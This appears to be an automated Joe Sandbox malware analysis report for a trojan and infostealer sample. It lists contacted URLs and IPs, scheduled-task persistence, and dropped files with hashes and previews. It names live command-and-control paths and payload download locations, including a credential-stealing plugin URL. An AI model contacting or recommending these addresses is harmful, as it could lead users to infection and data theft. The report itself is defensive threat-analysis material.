http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://193.56.146.174/g84kvj4jck/index.php?scr=1kvj4jck/index.php	rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://193.56.146.174/g84kvj4jck/index.php)M	rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows	94088433411392910584223625.45.dr	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15Response	2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome?p=update_error	86EE.exe, 0000002D.00000003.488301104.00000000275CA000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.488058790.00000000273BD000.00000004.00000800.00020000.00000000.sdmp, 41578002959771932956378793.45.dr, 94088433411392910584223625.45.dr	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm8D;	2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000002.572240339.000000000255C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/Y	816F.exe, 0000001A.00000003.502347136.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504941447.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503017067.00000000060D1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503500736.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504087152.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.506137806.00000000060CC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/intl/en_uk/chrome/Google	41578002959771932956378793.45.dr, 94088433411392910584223625.45.dr	false		high
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.299404500.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.286478895.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.276466462.000000000F276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.307788321.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.257994552.0000000001425000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://2w3.56.146.174/g84kvj4jck/index.php	rovwer.exe, 0000000F.00000002.558304896.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	41479232570897308364731578.45.dr	false		high
http://www.jiyu-kobo.co.jp/G	816F.exe, 0000001A.00000003.500229270.00000000060CE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24Response	2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.dr	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://svedbergbryanthusnonarithmetical.com/	vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id22Response(5	2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/u	816F.exe, 0000001A.00000003.500229270.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.497487573.00000000060CE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id4(5	2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comol	816F.exe, 0000001A.00000002.591760337.00000000060C0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/c	816F.exe, 0000001A.00000003.494973945.00000000060C5000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.497487573.00000000060CE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.213.50.70/Wavafursq.jpeg&BKl:	816F.exe, 0000001A.00000002.541785354.0000000000889000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id5Response	2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id1Response(5	2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Response	2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.597552021.0000000002B50000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8Response	2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t.me/deadftxhttps://www.tiktok.com/	86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/06/addressingex	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://193.56.146.174/U8eZkQ0Y1ZtSx2oLs	rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://o36fafs3sn6xou.com/Mozilla/5.0	explorer.exe, 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000028.00000000.448635710.0000000000950000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000028.00000002.522890770.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002C.00000002.523503696.0000000000810000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000000.454736835.00000000003E0000.00000040.80000000.00040000.00000000.sdmp	true	URL Reputation: safe	unknown
http://fontfabrik.com	816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro	94088433411392910584223625.45.dr	false		high
http://193.56.146.174/g84kvj4jck/Plugins/cred64.dlltE	rovwer.exe, 0000000F.00000002.542120947.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/intl/en_uk/chrome/	94088433411392910584223625.45.dr	false		high
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
43.231.112.109	hoteldostyk.com	Mongolia	63962	ITOOLS-ASiToolsJSCMN	true
195.96.151.53	cdn-104.anonfiles.com	unknown	8437	UTA-ASAT	true
195.96.151.51	cdn-102.anonfiles.com	unknown	8437	UTA-ASAT	true
140.82.121.3	unknown	United States	36459	GITHUBUS	false
140.82.121.4	github.com	United States	36459	GITHUBUS	false
162.159.133.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
108.167.141.212	srshf.com	United States	46606	UNIFIEDLAYER-AS-1US	true
144.76.136.153	transfer.sh	Germany	24940	HETZNER-ASDE	false
89.208.107.216	unknown	Russian Federation	42569	PSKSET-ASRU	true
52.217.206.73	s3-w.us-east-1.amazonaws.com	United States	16509	AMAZON-02US	false
104.192.141.1	bitbucket.org	United States	16509	AMAZON-02US	false
116.202.5.101	unknown	Germany	24940	HETZNER-ASDE	false
148.251.234.93	iplogger.com	Germany	24940	HETZNER-ASDE	false
195.216.243.155	u.to	United Kingdom	57724	DDOS-GUARDRU	false
185.199.108.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	true
193.56.146.174	unknown	unknown	10753	LVLT-10753US	false
77.232.37.228	o36fafs3sn6xou.com	Russian Federation	28968	EUT-ASEUTIPNetworkRU	true
46.252.148.24	1ecosolution.it	Italy	60087	ASSUPERNOVAIT	true
45.154.253.151	anonfiles.com	Sweden	41634	SVEASE	true
193.56.146.168	unknown	unknown	10753	LVLT-10753US	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	749806
Start date and time:	2022-11-19 10:36:06 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 53s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	S2XJ2wbz7u.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	47
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@67/30@58/22
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 13.5% (good quality ratio 11.6%) Quality average: 67.1% Quality standard deviation: 36%
HCA Information:	Successful, ratio: 98% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 93.184.220.29, 93.184.221.240
Excluded domains from analysis (whitelisted): google.com, fs.microsoft.com, cs9.wac.phicdn.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:37:52	Task Scheduler	Run new task: Firefox Default Browser Agent 56A8988D325A9B46 path: C:\Users\user\AppData\Roaming\tiddsjj
10:38:28	API Interceptor	111x Sleep call for process: rovwer.exe modified
10:38:29	Task Scheduler	Run new task: rovwer.exe path: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
10:38:39	API Interceptor	185x Sleep call for process: explorer.exe modified
10:39:04	API Interceptor	4x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\41479232570897308364731578

Download File

Process:	C:\Users\user\AppData\Local\Temp\86EE.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\41578002959771932956378793

Download File

Process:	C:\Users\user\AppData\Local\Temp\86EE.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.7217007190866341
Encrypted:	false
SSDEEP:	384:kab+d5neKTnuRpHDiEwABBE3umab+QuJdi:kab+dVeK8iEZBBjmab+QuJdi
MD5:	FEF7F4B210100663DC7731400BAC534E
SHA1:	E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A
SHA-256:	E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
SHA-512:	6134CC2118FBADD137C4FC3204028B088C7E73A7B985A64D84C60ABD5B1DBFD0AA352C6DF199F43164FEC92378571B5FAC4F801E9AF7BE1DEA8FB6C3C799F695
Malicious:	false
Preview:	SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\42863426655515339578900088

Download File

Process:	C:\Users\user\AppData\Local\Temp\86EE.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	1.4755077381471955
Encrypted:	false
SSDEEP:	96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
MD5:	DEE86123FE48584BA0CE07793E703560
SHA1:	E80D87A2E55A95BC937AC24525E51AE39D635EF7
SHA-256:	60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
SHA-512:	65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\84206842141166370440363339

Download File

Process:	C:\Users\user\AppData\Local\Temp\86EE.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\94088433411392910584223625

Download File

Process:	C:\Users\user\AppData\Local\Temp\86EE.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.7217007190866341
Encrypted:	false
SSDEEP:	384:kab+d5neKTnuRpHDiEwABBE3umab+QuJdi:kab+dVeK8iEZBBjmab+QuJdi
MD5:	FEF7F4B210100663DC7731400BAC534E
SHA1:	E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A
SHA-256:	E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
SHA-512:	6134CC2118FBADD137C4FC3204028B088C7E73A7B985A64D84C60ABD5B1DBFD0AA352C6DF199F43164FEC92378571B5FAC4F801E9AF7BE1DEA8FB6C3C799F695
Malicious:	false
Preview:	SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\95786452850497366982696300

Download File

Process:	C:\Users\user\AppData\Local\Temp\86EE.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\wpiq[1].zip

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1019991
Entropy (8bit):	7.9981268397514125
Encrypted:	true
SSDEEP:	24576:I8QnhcAisyibvw8QJTTRz+oH7OgXwWpiubynw7ynLbzCQ:Itns7GY1XSsOQfE/7bzCQ
MD5:	9E73FB50D37E37EE8BD19A8E3D2B82CA
SHA1:	3DB1C548E86E4BB7457324A3097B05DA15B7FFC3
SHA-256:	68BA7122EE8D9CE34ED94B6036A171CE38D6D9D9B3A609C2F4DE773F4DD40D5C
SHA-512:	B41209300F018103B0F8A4DE0537F348A3BDFCBC8FEB19E7FEC6634B06C266CC442145FD2D9230F827F273B0D07BB6BBCAB7A0F0E9E1F558E6DD7A076F568094
Malicious:	false
Preview:	PK.........e.K...yq1...@......7zxa.dll...x......d'.,.b.X%j....5.Q.7.....l.d.B.m%.)mi...$.6.2..b_...R}k[....FK...l"..O...FE.uC...02.9.../.?...=..<.......{...k.g.8N.?]....sr.....)W.0.{v.k.:.E....g]....~..k.......J.__.Q/.'..d......w.^}...).X.u..7..N........Y...i.....J........i.mi30..Mo.........i...D.GR~@.....}.....X......E\|.w.,...q7.J.0.U...,....<..}O`p.'...L..f..........PT.%..b`s..;..............\|I......<?}%./.06M......I_.8G^.....g.Fp.y.K.=..3&..$.O..a....V.6..8.]..._W...j:..g....9o._....R.+.2x^3!.<.......kv..S.u.f..L.m.......3....=....d.S....Q...~..........A..`...._f?.We.U6.H..D6...dk...4.Z....Q-...............a...^^...uTr...O:x'......uh.)..>"...f.S.l.Rb.}f.m..c.0%Yd...x.W...\....u..^....WZ..z......t+..{.....D....s.ne2....GN.qa.p..7.kD..5......v.C......~.k...f]6....P..%#.%.z.$E.!..>....#.. ......g..YH..7U.0..W.).S............^"..([.g.)d....iWc...j.w'....F.'s...M."..={.{s<........}.3..s).\|........\~.T..-k..V~....n......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\argq[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	167936
Entropy (8bit):	6.1797557233483955
Encrypted:	false
SSDEEP:	3072:IeAGcNNwmlR2GNUbomMYMLnbtoKOmiNL2SJOUOhop:CvNNtWuYcqHmiNLOc
MD5:	75375C22C72F1BEB76BEA39C22A1ED68
SHA1:	E1652B058195DB3F5F754B7AB430652AE04A50B8
SHA-256:	8D9B5190AACE52A1DB1AC73A65EE9999C329157C8E88F61A772433323D6B7A4A
SHA-512:	1B396E78E189185EEFB8C6058AA7E6DFE1B8F2DFF8BABFE4FFBEE93805467BF45760EEA6EFB8D9BB2040D0EAA56841D457B1976DCFE13ED67931ADE01419F55A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Metadefender, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R.D.3...3...3...,...3...3...3.../...3.......3.../...3.......3..Rich.3..........................PE..L...P.#B............................xH............@.........................................................................07..P....................................................................................................................text............................... ..`.rdata...a.......p..................@..@.data....b...P...@...P..............@...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
